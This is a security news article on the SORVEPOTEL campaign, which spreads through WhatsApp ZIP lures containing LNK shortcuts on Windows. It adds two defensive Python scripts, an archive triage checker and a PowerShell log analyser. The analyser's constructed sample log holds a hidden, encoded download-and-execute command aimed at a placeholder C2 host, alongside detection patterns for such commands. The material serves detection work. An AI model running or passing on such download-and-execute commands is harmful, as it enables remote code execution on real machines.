WhatsApp Exploited to Spread SORVEPOTEL Malware on Windows Systems


An aggressive malware campaign dubbed SORVEPOTEL is exploiting WhatsApp messages to infiltrate Windows systems, with its epicenter in Brazil.

Rather than pursuing data theft or ransomware extortion, this self-propagating malware is engineered for rapid spread, leveraging social trust and automation to reach new victims.

Trend Research telemetry shows that 457 of the 477 detected infections originate in Brazil, primarily within government and public service organizations, but also affecting the manufacturing, technology, education, and construction sectors.

The attack begins when a user receives a phishing message on WhatsApp from a compromised contact, often appearing as a colleague or friend.

These messages in Portuguese include a ZIP archive named to resemble legitimate documents—examples include “RES-20250930_112057.zip,” “ORCAMENTO_114418.zip,” or health-app receipts—urging the recipient to “baixa o zip no PC e abre” (download the ZIP on PC and open it).

Evidence suggests that email is an alternate vector, with phishing emails distributing ZIP attachments named like “COMPROVANTE_20251001_094031.zip” or “ComprovanteSantander-75319981.682657420.zip,” sent from seemingly legitimate sender addresses and subjects such as “Documento de Rafael B” or “Extrato.”

Inside the ZIP resides a Windows shortcut (.LNK) file that, when executed, surreptitiously launches a PowerShell or command-line script.

This script downloads the primary payload from attacker-controlled domains—typo-squatted URLs such as sorvetenopoate[.]com, expahnsiveuser[.]com, and sorvetenopotel[.]com—which serve as API endpoints for delivering the malicious components.

Figure: Encrypted command inside the LNK file that downloads the BAT file.

By masquerading as harmless shortcuts, these LNK files evade basic antivirus detection, enabling the campaign to maintain a foothold.
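The ZIP-plus-shortcut lure described above can be screened at a mail or messaging gateway before anyone double-clicks it. The Python below is an added example written for this article, not code from Trend Research or from the campaign: it opens an archive in memory and flags members that carry the Shell Link file header (so a .LNK renamed to look like a document is still caught), an executable extension, or a decoy double extension. The sample archive is constructed here, reusing the file name quoted in the article and holding only a shortcut header plus padding rather than a functional shortcut.

```python
import io
import os
import zipfile

# Every Shell Link (.LNK) file starts with HeaderSize 0x4C followed by the Shell Link
# CLSID {00021401-0000-0000-C000-000000000046}, serialised little-endian (MS-SHLLINK).
LNK_HEADER = bytes.fromhex("4C000000" "01140200" "0000" "0000" "C000000000000046")

# Extensions that execute on double-click; none of them belongs in a "receipt" archive.
EXECUTABLE_EXT = {".lnk", ".bat", ".cmd", ".ps1", ".vbs", ".js", ".jse", ".hta", ".exe", ".scr"}
DECOY_DOC_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png"}


def inspect_entry(name: str, head: bytes) -> list:
    """Return the reasons one archive member looks like a dropper, or [] if none."""
    reasons = []
    lower = name.lower()
    ext = os.path.splitext(lower)[1]
    if head.startswith(LNK_HEADER):
        reasons.append("shell-link header")          # a real .LNK whatever its name says
    if ext in EXECUTABLE_EXT:
        reasons.append("executable extension " + ext)
    stem_ext = os.path.splitext(os.path.splitext(lower)[0])[1]
    if stem_ext in DECOY_DOC_EXT and ext in EXECUTABLE_EXT:
        reasons.append("double extension")           # e.g. comprovante.pdf.lnk
    return reasons


def triage_zip(zip_bytes: bytes) -> dict:
    """Inspect a ZIP held in memory and decide whether to allow or block it."""
    findings = []
    total = 0
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            total += 1
            with zf.open(info) as fh:
                head = fh.read(len(LNK_HEADER))   # only the header is needed for the check
            reasons = inspect_entry(info.filename, head)
            if reasons:
                findings.append({"name": info.filename, "size": info.file_size, "reasons": reasons})
    return {"entries": total, "findings": findings, "verdict": "block" if findings else "allow"}


def build_sample_zip() -> bytes:
    """Constructed lure archive: the article's example name, a bare LNK header with
    padding (not a working shortcut), and a harmless text file."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("RES-20250930_112057.lnk", LNK_HEADER + b"\x00" * 64)
        zf.writestr("leiame.txt", b"constructed benign content\n")
    return buf.getvalue()


def build_benign_zip() -> bytes:
    """Constructed archive holding only a document-like member, for the negative case."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("orcamento.pdf", b"%PDF-1.4\n% constructed placeholder, not a real PDF\n")
    return buf.getvalue()


if __name__ == "__main__":
    print(triage_zip(build_sample_zip()))
    print(triage_zip(build_benign_zip()))
```

Checking the header rather than only the extension matters because the name inside the archive is under the sender's control; the CLSID check costs twenty bytes per member and does not depend on it.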

Persistence and Payload Execution

The downloaded payload is typically a batch (.BAT) script that secures persistence by copying itself into the Windows Startup folder, ensuring execution on every boot.

This script assembles and executes an obfuscated PowerShell command in hidden mode, utilizing Base64 encoding for its parameters.

Figure: Encrypted command inside the BAT file that connects to the C2 server to retrieve additional payloads.

Once decoded, the script reaches out to multiple command-and-control (C&C) servers, downloading and executing additional payloads in memory via Invoke-Expression, which avoids writing to disk and reduces forensic traces.
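Process-creation telemetry (Sysmon Event ID 1, or Windows 4688 with command-line auditing) is where the BAT-to-PowerShell chain above becomes visible. The Python below is an added detection example, not code from the article or from Trend Micro: it decodes the Base64-over-UTF-16LE argument that powershell.exe accepts for -EncodedCommand and matches both the visible command line and the decoded script against the behaviours the article names (hidden window, encoded parameters, Invoke-Expression, in-memory download, Startup-folder persistence). The pipe-delimited log format, host name, user paths and the hostname c2.example.invalid are constructed for the example; the encoder function exists only to build that sample.

```python
import base64
import re
from typing import Optional

# powershell.exe accepts any unambiguous prefix of -EncodedCommand; match the usual spellings.
ENCODED_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Behaviours the article attributes to the loader chain, as case-insensitive patterns.
INDICATORS = {
    "hidden window":     re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "policy bypass":     re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "encoded command":   ENCODED_ARG,
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "web download":      re.compile(r"net\.webclient|downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod", re.I),
    "startup folder":    re.compile(r"\\start menu\\programs\\startup\\", re.I),
}


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Recover the script hidden behind -EncodedCommand (Base64 over UTF-16LE), or None."""
    m = ENCODED_ARG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None   # bad Base64 or an odd byte count: not a valid encoded command


def encode_for_powershell(script: str) -> str:
    """Inverse transform, used here only to build the constructed sample event."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def analyze_event(event: dict) -> dict:
    cmd = event["command_line"]
    decoded = decode_encoded_command(cmd)
    # Match the visible command line AND the decoded script, so Base64 does not hide
    # IEX or the download call from the rule.
    text = cmd + ("\n" + decoded if decoded else "")
    hits = [name for name, pat in INDICATORS.items() if pat.search(text)]
    if len(hits) >= 3 or {"invoke-expression", "web download"} <= set(hits):
        verdict = "alert"
    else:
        verdict = "suspicious" if hits else "clean"
    return {"time": event["time"], "host": event["host"], "image": event["image"],
            "decoded": decoded, "indicators": hits, "verdict": verdict}


def parse_event(line: str) -> dict:
    """Constructed format: time|host|parent_image|image|command_line (command line may hold '|')."""
    time, host, parent, image, cmd = line.split("|", 4)
    return {"time": time, "host": host, "parent_image": parent, "image": image, "command_line": cmd}


def scan_log(text: str) -> list:
    return [analyze_event(parse_event(line)) for line in text.splitlines() if line.strip()]


# --- constructed sample data (not captured from the campaign) ---
STARTUP_BAT = r"C:\Users\ana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sample.bat"
CONSTRUCTED_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('https://c2.example.invalid/stage2')"
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOG = "\n".join([
    r"2025-10-01T09:40:31Z|WS-017|C:\Windows\explorer.exe|C:\Windows\System32\cmd.exe|"
    + 'cmd.exe /c "' + STARTUP_BAT + '"',
    r"2025-10-01T09:40:32Z|WS-017|C:\Windows\System32\cmd.exe|" + PS_IMAGE + "|"
    + "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand "
    + encode_for_powershell(CONSTRUCTED_PAYLOAD),
    r"2025-10-01T09:41:00Z|WS-017|C:\Windows\explorer.exe|" + PS_IMAGE + "|"
    + r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users\ana\Documents",
])

if __name__ == "__main__":
    for result in scan_log(SAMPLE_LOG):
        print(result["verdict"], result["image"], result["indicators"])
```

The third sample line is an ordinary interactive PowerShell launch and stays clean, which is the point of scoring several indicators together rather than alerting on powershell.exe alone; the decoded script is kept in the result so an analyst can read what would have run.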

Trend Research analysis highlighted that the malware maintains continuous communication with its C&C infrastructure, allowing threat actors to update instructions or deploy secondary modules.

Despite the sophistication of its delivery and persistence techniques, current campaign activity reveals no evidence of data exfiltration or file encryption; the emphasis remains squarely on self-propagation rather than deeper system compromise.

A hallmark of SORVEPOTEL is its ability to detect active WhatsApp Web sessions on infected machines. Upon identifying an authenticated session, the malware automatically redistributes the same malicious ZIP file to all contacts and groups in the victim’s address book.

This automated forwarding mechanism drives exponential spread, inundating targets with spam and frequently resulting in compromised accounts being suspended or banned for violating WhatsApp’s terms of service.

Threat actors behind SORVEPOTEL exploit obfuscation at multiple levels—using typo-squatted domains that mimic the innocuous phrase “sorvete no pote” (ice cream in a cup) and embedding commands with encryption and encoding.

Additional infrastructure, including domains like cliente[.]rte[.]com[.]br, has been leveraged for malware distribution, indicating ongoing adaptation and diversification of delivery channels.

Mitigations

The SORVEPOTEL campaign underscores how popular messaging platforms can serve as force multipliers for malware distribution.

Rapid self-propagation with minimal user action illustrates the evolving landscape of social engineering combined with automation.

Organizations should enforce robust phishing defenses, disable automatic execution of LNK files where possible, and monitor for anomalous WhatsApp Web session behaviors.

While the current scope focuses on widespread infection and account bans rather than destructive payloads, parallels with prior Brazilian campaigns targeting financial data suggest potential for future escalation.

User awareness training is critical—employees must be cautious when opening attachments received via messaging apps.

Trend Micro continues to track SORVEPOTEL closely and advises maintaining updated endpoint security solutions, applying least-privilege principles, and staying vigilant against emerging techniques targeting messaging platforms.


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.